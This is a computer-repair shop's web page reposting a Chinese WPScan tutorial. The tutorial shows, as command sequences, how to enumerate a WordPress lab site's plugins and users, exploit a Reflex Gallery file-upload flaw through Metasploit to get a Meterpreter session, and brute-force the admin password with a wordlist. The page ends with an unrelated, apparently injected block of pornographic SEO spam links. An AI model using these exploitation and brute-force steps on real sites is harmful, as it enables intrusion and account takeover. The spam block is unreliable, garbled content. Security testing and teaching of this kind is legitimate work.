錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務(wù)技術(shù)文章
WPScan使用教程,如何對(duì)WordPress站點(diǎn)進(jìn)行安全測(cè)試

作者: 佚名  日期:2018-06-24 19:58:23   來源: 本站整理

 WPScan使用完整攻略:如何對(duì)WordPress站點(diǎn)進(jìn)行安全測(cè)試。本文將告訴大家如何使用WPScan來對(duì)WordPress站點(diǎn)進(jìn)行安全測(cè)試。

WPScan是Kali Linux默認(rèn)自帶的一款漏洞掃描工具,它采用Ruby編寫,能夠掃描WordPress網(wǎng)站中的多種安全漏洞,其中包括主題漏洞、插件漏洞和WordPress本身的漏洞。最新版本W(wǎng)PScan的數(shù)據(jù)庫中包含超過18000種插件漏洞和2600種主題漏洞,并且支持最新版本的WordPress。值得注意的是,它不僅能夠掃描類似robots.txt這樣的敏感文件,而且還能夠檢測(cè)當(dāng)前已啟用的插件和其他功能。

接下來,讓我們進(jìn)入正題…

工具安裝與運(yùn)行

Kali Linux默認(rèn)自帶了WPScan,你也可以使用下列命令在自己的設(shè)備中安裝WPScan:

git clone https://github.com/wpscanteam/wpscan.git

\

切換到WPScan目錄中,運(yùn)行下列命令查看幫助信息:

./wpscan.rb–h

\

你也可以使用以下命令更新漏洞庫:

wpscan -update

掃描WordPress站點(diǎn)

我們可以使用–enumerate選項(xiàng)來掃描并發(fā)現(xiàn)關(guān)于目標(biāo)站點(diǎn)主題、插件和用戶名信息。輸入下列命令開始對(duì)服務(wù)器進(jìn)行掃描:

./wpscan.rb –u http://192.168.0.101/wordpress/

如果你不知道目標(biāo)服務(wù)器的IP地址,你可以直接輸入U(xiǎn)RL地址。下面給出的是掃描結(jié)果:

\

從結(jié)果中可以看到,服務(wù)器信息為Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1。我們還發(fā)現(xiàn),上傳目錄開啟了目錄監(jiān)聽功能,因此任何人都可以通過訪問wp-content/uploads來查看目錄中的上傳內(nèi)容。

主題掃描

使用下列命令對(duì)主題進(jìn)行掃描:

./wpsca.rb –u http://192.168.0.101/wordpress --enumerate t

\

使用下列命令掃描主題中存在的漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt

\

插件掃描

插件可以擴(kuò)展WordPress站點(diǎn)的功能,但很多插件中都存在安全漏洞,而這也會(huì)給攻擊者提供可乘之機(jī)。

我們可以使用下列命令掃描WordPress站點(diǎn)中安裝的插件:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p

\

我們可以看到該網(wǎng)站中安裝了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3以及很多其他的插件。

\

接下來,我們可以使用下列命令來掃描目標(biāo)插件中的安全漏洞:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp

\

我們可以從掃描結(jié)果中看到這三款插件中存在的漏洞以及利用路徑:

\

結(jié)合Metasploit利用插件中的漏洞

接下來,我們將用第一個(gè)插件中的任意文件上傳漏洞來進(jìn)行漏洞利用演示,該漏洞允許我們上傳惡意文件并實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。

打開終端窗口并輸入下列命令:

useexploit/unix/webapp/wp_reflexgallery_file_upload

msfexploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msfexploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/

msfexploit(wp_reflexgallery_file_upload) > exploit

你將看到終端與目標(biāo)設(shè)備建立了Meterpreter會(huì)話,你可以輸入下列命令查看目標(biāo)系統(tǒng)信息:

Sysinfo

\

枚舉WordPress用戶名

我們可以在終端中輸入下列命令來枚舉WordPress用戶名:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u

\

接下來工具將導(dǎo)出用戶名數(shù)據(jù)表,你可以看到用戶名以及對(duì)應(yīng)的ID信息。

當(dāng)然了,你也可以使用下列命令枚舉出所有的內(nèi)容:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u

–e at : enumerate all themes of targeted website

–e ap: enumerate all plugins of targeted website

–e u: enumerate all usernames of targeted website

\

使用WPScan進(jìn)行暴力破解

在進(jìn)行暴力破解攻擊之前,我們需要?jiǎng)?chuàng)建對(duì)應(yīng)的字典文件。輸入下列命令:

./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --usernameadmin

\

如果找到了相匹配的用戶名與密碼,工具將直接以admin:password的形式顯示出來:



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 亚洲免费日韩无码系列| 亚洲成A人片在线观看无码不卡 | 人妻丰满熟妞av无码区 | 久久国产精品无码一区二区三区| 曰韩人妻无码一区二区三区综合部| 亚洲av无码专区首页| 亚洲精品无码专区久久久| 成人无码精品一区二区三区| 国产午夜无码精品免费看动漫 | 在线看片福利无码网址| 国产麻豆天美果冻无码视频| 亚洲av无码专区在线电影| 亚洲成A人片在线观看无码不卡| 国产精品成人99一区无码| 亚洲AV日韩AV永久无码下载| 亚洲Av无码国产情品久久| 久久久国产精品无码免费专区| 亚洲日韩精品无码专区| 中文字幕AV中文字无码亚| 亚洲a∨无码精品色午夜| 日韩精品久久无码中文字幕| 国产av无码专区亚洲av桃花庵| 内射无码午夜多人| 精品少妇人妻AV无码专区不卡| 无码人妻AⅤ一区二区三区 | 亚洲AV无码一区二区三区DV| 亚洲中久无码不卡永久在线观看| 午夜爽喷水无码成人18禁三级| 人妻无码久久一区二区三区免费| 国产Av激情久久无码天堂| 日韩人妻无码精品系列| 精选观看中文字幕高清无码| 一区二区三区无码高清视频| 亚洲人成无码网WWW| 久久久久久无码国产精品中文字幕 | 国产精品亚洲а∨无码播放| 色综合久久久无码中文字幕| 成人免费无码大片A毛片抽搐色欲| 无码不卡av东京热毛片| 亚洲综合无码一区二区痴汉| 亚洲午夜无码久久|